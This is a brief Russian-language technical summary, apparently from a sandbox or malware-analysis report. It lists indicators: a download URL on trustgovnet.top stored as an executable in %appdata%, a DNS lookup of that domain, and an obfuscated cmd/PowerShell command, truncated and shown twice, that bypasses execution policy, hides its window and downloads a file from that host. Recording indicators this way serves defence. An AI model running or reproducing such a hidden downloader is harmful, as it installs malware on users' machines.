Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^wERSHe^ll.e^xe^ -Ex^ECutiO^n^po^LICy b^yPASS -nOpROf^IlE^ ^-^wInD^owS^TyL^E ^h^i^dDE^N (N^e^w^-^oB^jE^c^t^ S^Ys^T^em.Net.^wEBCLIe^nt^).dOwnlOADf^ILE('http://trustgovnet.top/sea...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "po^wERSHe^ll.e^xe^ -Ex^ECutiO^n^po^LICy b^yPASS -nOpROf^IlE^ ^-^wInD^owS^TyL^E ^h^i^dDE^N (N^e^w^-^oB^jE^c^t^ S^Ys^T^em.Net.^wEBCLIe^nt^).dOwnlOADf^ILE('http://trustgovnet.top/sea...' (со скрытым окном)